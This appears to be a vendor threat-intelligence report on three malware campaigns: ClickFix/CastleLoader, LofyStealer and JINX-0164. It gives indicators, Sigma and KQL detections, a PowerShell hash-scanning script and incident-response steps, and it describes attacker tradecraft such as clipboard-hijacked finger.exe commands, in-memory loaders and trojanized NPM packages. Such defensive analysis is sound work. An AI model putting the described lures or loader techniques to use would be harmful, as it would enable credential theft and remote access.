Recent OTX pulses indicate a convergence of sophisticated, financially motivated threat campaigns targeting distinct sectors: general end-users, gamers, and cryptocurrency developers.

ClickFix utilizes a novel "BackgroundFix" lure, hijacking the clipboard to force victims to execute finger.exe, leading to a CastleLoader infection chain that drops NetSupport RAT and CastleStealer.
LofyGang (LofyStealer) continues to evolve, employing a massive 53.5MB Node.js loader to obfuscate a memory-resident C++ infostealer targeting Minecraft players.
JINX-0164 represents a tailored threat to the software supply chain, specifically targeting cryptocurrency organizations via LinkedIn social engineering and malicious NPM packages to deliver macOS-specific RATs (AUDIOFIX, MINIRAT).

Collectively, these actors abuse legitimate tools (finger.exe, Node.js) and platforms (LinkedIn, NPM) to bypass standard heuristic defenses, emphasizing the need for behavioral monitoring and strict software governance.

Threat Actor / Malware Profile

1. ClickFix (CastleLoader, NetSupport RAT, CastleStealer)

Distribution: Social engineering via fake image-editing tools ("BackgroundFix"). Prompts users to copy/paste commands containing finger.exe.
Payload Behavior: finger.exe retrieves the CastleLoader payload, which decrypts and loads NetSupport RAT (remote access) and CastleStealer (data theft).
C2 Communication: Connects to domains like poronto.com and trindastal.com on non-standard port 688.
Persistence: Established via NetSupport RAT service configurations.
Anti-Analysis: Uses a reflective loader to keep payloads in memory, avoiding disk writes.

2. LofyGang (LofyStealer / GrabBot)

Distribution: Targeted social engineering against Minecraft players (e.g., fake mods, cheats).
Payload Behavior: Two-stage attack. A massive Node.js loader unpacks a 1.4MB C++ payload executed directly in memory ("chromelevator"). Targets 8+ browsers for credentials.
C2 Communication: Uses custom C2 protocols; capable of receiving syscalls to evade detection.
Persistence: Registry manipulation and scheduled tasks common to infostealers.
Anti-Analysis: Large loader size and memory-only execution frustrate sandbox detonation.

3. JINX-0164 (AUDIOFIX, MINIRAT)

Distribution: LinkedIn phishing (posing as recruiters) and supply chain compromise via trojanized NPM packages.
Payload Behavior:
- AUDIOFIX: Python-based infostealer/RAT for macOS.
- MINIRAT: Lightweight Go backdoor.
C2 Communication: Communicates with infrastructure hosted on driver-updater.net and live.ong.
Persistence: Launch agents and scripts (e.g., install.sh) on macOS.
Anti-Analysis: Targets macOS infrastructure which often has less EDR coverage than Windows counterparts.

IOC Analysis

The indicators provided span multiple vectors requiring a layered defense approach:

Domains & URLs: The pulses highlight specific C2 domains (poronto.com, trindastal.com, driver-updater.net) and typosquatting attempts (login.teamicrosoft.com). These should be blocked at the DNS and Proxy level. Notably, traffic over port 688 (HTTP) is suspicious for these specific domains.
File Hashes: A mix of SHA256 and MD5 hashes are provided for the loaders and payloads. These should be ingested into EDR solutions for immediate quarantine.
Operationalization: SOC teams should use TIPs (Threat Intelligence Platforms) to auto-push these IOCs to blocklists. The presence of finger.exe in process logs is a high-fidelity behavioral indicator for the ClickFix campaign.

Detection Engineering

YAML

---
title: Potential ClickFix BackgroundFix Activity via Finger.exe
id: 20260604-001
description: Detects the execution of finger.exe, a legacy tool abused in ClickFix campaigns to retrieve malicious payloads via clipboard hijacking commands.
status: experimental
author: Security Arsenal
date: 2026/06/04
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\finger.exe'
    condition: selection
falsepositives:
    - Legitimate use of finger utility (rare in modern environments)
level: high
---
title: Suspicious Node.js Loader Spawning Shell (LofyStealer)
id: 20260604-002
description: Detects Node.js processes spawning cmd.exe or powershell.exe, indicative of the LofyStealer Node.js loader activating a C++ payload.
status: experimental
author: Security Arsenal
date: 2026/06/04
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\node.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: selection
falsepositives:
    - Legitimate development scripts
level: medium
---
title: macOS Suspicious Remote Installation Script (JINX-0164)
id: 20260604-003
description: Detects execution of remote installation scripts (install.sh) via curl or wget, associated with JINX-0164 supply chain attacks targeting crypto developers.
status: experimental
author: Security Arsenal
date: 2026/06/04
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        Image|endswith:
            - '/curl'
            - '/wget'
        CommandLine|contains: 'install.sh'
    condition: selection
falsepositives:
    - Legitimate software installation
level: high


kql
// Hunt for ClickFix finger.exe activity and C2 connections
let ClickFixDomains = dynamic(["trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com"]);
let JINXDomains = dynamic(["driver-updater.net", "login.teamicrosoft.com", "live.ong", "teams.live.us.org"]);
// 1. Process Hunt
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "finger.exe" or ProcessVersionInfoOriginalFileName =~ "finger.exe"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| union ( 
    DeviceProcessEvents  
    | where Timestamp > ago(7d)
    | where InitiatingProcessFileName =~ "node.exe" and FileName in (~"cmd.exe", ~"powershell.exe")
    | project Timestamp, DeviceName, AccountName, "ProcessType" = "NodeSpawningShell"
);
// 2. Network Hunt
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (ClickFixDomains) or RemoteUrl has_any (JINXDomains)
| project Timestamp, DeviceName, ActionType, RemoteUrl, RemotePort, RemoteIP


powershell
# IOC Hunt Script for ClickFix, LofyStealer, and JINX-0164 Payloads
# Requires Admin Privileges

$MaliciousHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92", # CastleLoader
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9", # NetSupport/Related
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881", # LofyStealer
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7", # LofyStealer
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"  # JINX-0164
)

Write-Host "[*] Scanning for known malicious file hashes (This may take time)..." -ForegroundColor Cyan

$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    Write-Host "Scanning $Drive..."
    Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue -Force | 
    Where-Object { $_.PSIsContainer -eq $false } | 
    ForEach-Object {
        $FilePath = $_.FullName
        try {
            $FileHash = (Get-FileHash -Path $FilePath -Algorithm SHA256 -ErrorAction Stop).Hash
            if ($MaliciousHashes -contains $FileHash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $FilePath (Hash: $FileHash)" -ForegroundColor Red
            }
        } catch {
            # Ignore access errors
        }
    }
}

Write-Host "[*] Checking for NetSupport RAT persistence in Registry..." -ForegroundColor Cyan
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
)

$Paths | ForEach-Object {
    if (Test-Path $_) {
        Get-ItemProperty -Path $_ -ErrorAction SilentlyContinue | 
        Where-Object { $_.PSObject.Properties.Value -match "client32" -or $_.PSObject.Properties.Name -match "NetSupport" } | 
        ForEach-Object {
            Write-Host "[!] Suspicious Persistence found in $_" -ForegroundColor Yellow
            $_ | Format-List
        }
    }
}


# Response Priorities

**Immediate (0-24h):**
1.  **Block IOCs:** immediately block the listed domains (`poronto.com`, `driver-updater.net`, etc.) and file hashes on perimeter gateways and EDRs.
2.  **Hunt for `finger.exe`:** Search historical logs for the execution of `finger.exe`. Any instance outside of specific legacy environments should be treated as a compromised host.
3.  ** quarantine hosts:** Isolate devices that have communicated with the non-standard port 688 associated with ClickFix.

**24h:**
1.  **Credential Reset:** If LofyStealer or CastleStealer is suspected, force a password reset for affected users and invalidate session tokens (especially for Minecraft-related accounts if personal devices are BYOD, and crypto wallets for JINX-0164 targets).
2.  **Supply Chain Audit:** For technology and crypto sectors, audit `package.` files and recent npm package installs for references to typosquatted domains or unexpected dependencies.

**1 Week:**
1.  **Application Whitelisting:** Restrict the use of `finger.exe` and unsigned Node.js executators for non-developer endpoints.
2.  **Awareness Training:** Update security awareness training to specifically highlight "clipboard hijacking" (ClickFix) and LinkedIn recruitment scams (JINX-0164).
3.  **macOS Hardening:** Review and enforce strict controls on Gatekeeper and execution of unsigned scripts for developer workstations.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

ClickFix, LofyStealer & JINX-0164: Multi-Vector Social Engineering & Supply Chain Assaults — OTX Pulse Analysis